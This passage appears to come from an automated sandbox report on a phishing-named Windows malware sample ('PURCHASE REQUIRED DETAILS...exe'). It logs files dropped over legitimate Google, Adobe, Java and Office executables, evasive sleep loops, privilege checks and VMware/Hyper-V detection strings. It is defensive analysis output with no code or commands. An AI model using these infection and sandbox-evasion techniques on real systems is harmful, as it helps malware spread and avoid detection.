                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_9-12900
                  Source: C:\Windows\System32\SensorDataService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\FXSSVC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\alg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-5854
                  Source: C:\Windows\System32\msdtc.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_17-5698
                  Source: C:\Windows\System32\Locator.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Users\Public\alpha.pifAPI coverage: 6.3 %
                  Source: C:\Users\Public\alpha.pifAPI coverage: 7.8 %
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep count: 35 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -99862s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 6852Thread sleep count: 7315 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 6852Thread sleep count: 2503 > 30Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -99734s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -99624s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -99513s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -99406s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -99297s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -99156s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -99004s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -98787s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -98656s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -98546s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -98437s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -98328s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -98219s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -98109s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -98000s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -97890s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -97781s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -97672s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -97562s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -97452s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -97343s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -97234s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -97125s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -97015s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -96906s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -96796s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -96687s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -96576s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -96219s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -96031s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -95922s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -95812s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -95703s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -95593s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -95484s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -95374s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -95265s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -95156s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -95046s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -94937s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -94828s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -94718s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -94609s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -94499s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -94361s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -94234s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -94125s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -94015s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -93888s >= -30000sJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif TID: 7108Thread sleep time: -93671s >= -30000sJump to behavior
                  Source: C:\Windows\System32\alg.exe TID: 7316Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\msdtc.exe TID: 6992Thread sleep count: 491 > 30
                  Source: C:\Windows\System32\msdtc.exe TID: 6992Thread sleep time: -49100s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\Public\xpha.pifLast function: Thread delayed
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B15908
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,13_2_001A0207
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,13_2_001A589A
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001B3E66 FindFirstFileW,FindNextFileW,FindClose,13_2_001B3E66
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,13_2_001A4EC1
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_0019532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,13_2_0019532E
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,22_2_001A589A
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,22_2_001A0207
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001B3E66 FindFirstFileW,FindNextFileW,FindClose,22_2_001B3E66
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,22_2_001A4EC1
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_0019532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,22_2_0019532E
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 99862Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 99734Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 99624Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 99513Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 99406Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 99297Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 99156Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 99004Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 98787Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 98656Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 98546Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 98437Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 98328Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 98219Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 98109Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 98000Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 97890Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 97781Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 97672Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 97562Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 97452Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 97343Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 97234Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 97125Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 97015Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 96906Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 96796Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 96687Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 96576Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 96219Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 96031Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 95922Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 95812Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 95703Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 95593Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 95484Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 95374Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 95265Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 95156Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 95046Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 94937Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 94828Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 94718Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 94609Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 94499Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 94361Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 94234Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 94125Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 94015Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 93888Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 93671Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: SensorDataService.exe, 0000001F.00000002.1855950363.00000000004EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .inVMware Virtual disk SCSI Disk Devicet System Management
                  Source: Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`VZ%SystemRoot%\system32\mswsock.dll==.aP
                  Source: SensorDataService.exe, 0000001F.00000003.1848760946.00000000004D2000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1781177346.00000000005AA000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1780783107.00000000005AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1700499143.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504408832.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1685939273.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1687626189.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281172548.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1670852449.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: SensorDataService.exe, 0000001F.00000002.1855950363.00000000004EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: SensorDataService.exe, 0000001F.00000003.1848760946.00000000004D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter.dll,-2102
                  Source: SensorDataService.exe, 0000001F.00000003.1750375651.00000000004D4000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1783409850.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000023.00000003.1780783107.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
                  Source: AppVClient.exe, 00000011.00000003.1638891220.00000000004AF000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000011.00000002.1641101952.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000011.00000003.1639261437.00000000004B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
                  Source: Spectrum.exe, 00000023.00000002.2675188373.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Device
